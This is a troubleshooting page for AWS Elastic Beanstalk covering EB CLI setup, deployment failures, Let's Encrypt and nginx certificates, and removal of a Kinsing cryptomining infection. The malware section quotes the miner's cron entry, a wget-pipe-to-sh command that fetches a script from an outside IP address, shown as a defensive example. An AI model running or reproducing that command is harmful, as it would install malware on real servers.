Troubleshooting Elastic Beanstalk Deployment

Installation

EB CLI is missing python

EB CLI installation is hosted on GitHub.

Uninstall EB CLI:

$ rm -rf ~/.ebcli-virtual-env/

Also make sure that EB CLI has not been installed using brew:

$brew uninstall awsebcli

Refer to Advanced Use in the GitHub README for installation instructions. Install just the EB CLI (as opposed to the package installer which also installs python), and point it to an existing python version:

$ python ./aws-elastic-beanstalk-cli-setup/scripts/ebcli_installer.py --python-installation /path/to/local/python/

If for some reason EB CLI requires a version of python that is not installed locally, use pyenv to install that version of python and use the method above to link EB CLI to it.

Deployment

eb deploy failure

Run eb logs in the local distribution of the environment to view the latest commands run in the EBS environment.
- If eb logs generates a "permission denied" message, try eb logs --instance [EBS-INSTANCE-ID] --verbose
View the tail of the file /var/log/cfn-init-cmd.log. This file will list all commands in .ebextensions and whether they executed successfully or not.
Check the .ebextensions config files on the server in /var/app/staging/
Confirm the domain settings in AWS Route 53.
Confirm that the web files have been uploaded to /var/www/html/.
Confirm the EBS raw URL to the site: AWS Console > Elastic Beanstalk > Environments > click on the URL for the environment in question
Scale back the application and incrementally deploy.
- Remove all web files except for a boilerplate "Hello, World" index file.
- Comment out all commands in .ebextensions configuration files.
- Remove composer.json
- Run eb deploy to see if it can successfully upload this most basic environment.
- Incrementally add back components of the application and redeploy to isolate problematic components.

Directives in .ebextensions config files aren't executed

AWS eb cli uses git HEAD to create zip file to upload to the server.

Confirm that zip files have been added and committed to the repo.

Or to deploy changes before they are committed:

$ eb deploy --staged

Make sure to stage any edits with git (e.g. git add) before running eb deploy with the --staged option!

Cannot create files in /etc/nginx/conf.d with .ebextensions

According to this Stackoverflow thread, WebSockets on Elastic Beanstalk with Docker, it seems that when EBS creates an application it basically clears out the nginx configuration after the .ebextensions commands are run. So any custom ngnix configuration done through .ebextensions would be overwritten.

I have confirmed this insofar as I put my nginx configuration in a file and uploaded it successfully to the ec2-user home directory. I put in another command to move that file to the nginx configuration directory, and after the application was successfully deployed, the custom nginx configuration file was gone.

There were some solutions offered on the Stackoverflow thread above. They involved moving Python scripts to an EBS “hooks” directory which would be executed after the application is deployed. There is no “hooks” directory in that location on my EBS server. For the time being, I am manually creating the nginx config file on the command line on the server after the application is deployed. This will allow the server to use the Let’s Encrypt certificates to serve https requests, and should stay in place through LE certificate renewals until the next application deployment.

The AWS documentation assumes that you generate the certificates manually and insert the contents of the certificate in the .ebextensions config file. The alternative example above places the command to generate the certificates in the .ebextensions config file. There is a flag that is incompatible with production environments: --staging. This will cause the Let's Encrypt staging server to issue the certificates. The server address will also get stored in a local config file, so subsequent attempts to reissue the certificates without the --staging flag will still invoke that staging server. ^[1]

systemctl command not found

The AWS documentation uses systemctl to restart the Apache server. If this command is not available use the service command instead.

Cannot find SSLCertificateFile directive

When running letsencrypt-auto or certbot-auto

Cannot find an SSLCertificateFile directive in /files/etc/httpd/conf/httpd-le-ssl.conf/IfModule/VirtualHost. VirtualHost was not modified
Unable to find an SSLCertificateFile directive

This was fixed by successfully installing mod_ssl

Re-installing certificates after upgrading an Elastic Beanstalk instance platform

See Easy Secure Single-Instance Elastic Beanstalk Apps.

The idea behind this is:

Run a script that checks if security certificates are installed.
1. Certfiicates are not installed.
  1. Download and install the certbot utility script if it is not installed.
  2. Use certbot to install Let's Encrypt certificates.
  3. After installing the LE certificates, certbot will update the nginx configuration files to allow SSL to reference the certificates.
2. Certificates are installed.
  1. Do not attempt to install any certficates.
  2. Before deploying the app, save the nginx config files modified by certbot.
  3. After deploying the app, restore the nginx config files that were modified by certbot.

Connectivity

Empty HTTP response

Symptom

Make a request for the URL of the site via curl:

$ curl https://www.mydomain.com

0 bytes and no headers sent in response.

Possible cause

PHP code is exiting without errors, but before returning a response.

Solution

Check nginx logs.

/var/log/nginx/access.log
/var/log/nginx/error.log

PHP errors are logged to the nginx error log.

Confirm that requests are being made to the correct host. If nothing is reported in the log files, try connecting to a non-existent file. Then view the access log to confirm that a 404 error was logged.

Confirm PHP configuration. Upload a simple index.php file to the server containing a "Hello world" type of response. Make a request to that page. If the server returns the expected response, then it will be necessary to step through the production PHP to locate the code that is causing the script to exit without a response.

ERR_CONNECTION_REFUSED in Chrome

Attempting to load the site using https protocol in Chrome results in ERR_CONNECTION_REFUSED error.

Check the security certificates in /etc/letsencrypt/live/. There should be a directory with the name of the domain, and another directory named ebcert that is a symbolic link to /etc/letsencrypt/live/securedomainname.com

If this directory does not exist, refer to Elastic Beanstalk Security Certificates for instructions on installing the security certificates.

Check that the server is configured to accept requests on port 443, e.g. in /etc/nginx/conf.d/https_custom.conf

nginx configuration is set back to defaults during eb deploy, meaning the certificates configuration is removed from the server. Also, haven't figured out how to insert custom configuration on the server via .ebextensions configuration directives. It may be necessary to copy this https configuration file manually after running eb deploy.

403 HTTP error

Receiving a 403 error when attempting to load the hosted site indicates that something unintended was uploaded to the root of the web directory.

SSH to the server to confirm the content of that directory, e.g. /var/www/html/.

Elastic Beanstalk environment health

CPU is maxed out

Symptom

The environment is displayed with a warning in the Elastic Beanstalk console. Under the Health tab for the environment the cause is reported as "100% of CPU is in use".

Diagnostics

Run top on the server command line to find which process is using the CPU.

Solution

These are symptoms of a Kinsing malware infection.

A process named kdevtmpfsi is bitcoin mining malware. Making files that the process access unavailable to it will prevent it from using CPU. ^[2]

Confirm the process that is consuming the CPU:

$ top

Kill the process:

 
$ kill -9 [PID]

Search for files the scripts rely on. These are typically located in /tmp

$ find / -name "kdevtmpfs*"
$ find / -name "kinsing*"

Search inside files for references to kdevtmpfsi.

$ find / -type f -exec grep -l "kdevtmpfsi" {} +

Prevent access to files in /tmp.

$ chmod 000 /tmp/kdevtmpfsi*
$ chmod 000 /tmp/kinsing*
$ chmod 000 /tmp/zzz
$ chattr -iR /tmp/kdevtmpfsi*
$ chattr -iR /tmp/kinsing*
$ chattr -iR /tmp/zzz

Search for cron jobs that are re-installing the malware. In the last case the cron job was owned by the user webapp.

$ crontab -u webapp -l

On an infected system, this will result in something like this:

* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1

The crontab for the other user can be edited with:

$ crontab -e -u [USER]

Or if the only line is the command that downloads the mining script, the crontab for the user can be deleted entirely with

$ crontab -u [USER] -r

Show all processes that the user is currently running and kill any mining processes.

$ ps -ef | grep <user>

Make /tmp and /var/tmp accessible only to root:

$ chmod go-rwx /var/tmp
$ chmod 1777 /tmp

Allow only root (and other select accounts) to modify crontab:

$ touch /etc/cron.allow
$ echo “root” > /etc/cron.allow
$ echo “{otherusername}” >> /etc/cron.allow

TODO: This malware is associated with Docker containers, redis, PHPMailer, and Solr. I don't think any of these components are part of the current app distribution, but search for them before any future deployments.

TODO: Block those IP addresses in EC2.

A comment on Delete MINER from php-fpm container! laradock Github issue #2451 describes how to block the miner until the server can be rebuilt.
kdevtmpfsi & kinsing - the malware miner that will eat your CPU has information about identifying and disabling the source of the malware.
a suspicious process named 'kdevtmpfsi'，likely related to redis official image
Threat Alert: Kinsing Malware Attacks Targeting Container Environments has detailed information about the nature of the malware, but not much information about how to remove the malware.

Notes

↑ CN=Fake LE Intermediate X1 - Let's Encrypt forums
↑ kdevtmpfsi using the entire cpu - StackOverflow

[1] CN=Fake LE Intermediate X1 - Let's Encrypt forums

[2] vtmpfsi using the entire cpu - StackOverflow

[1]

[2]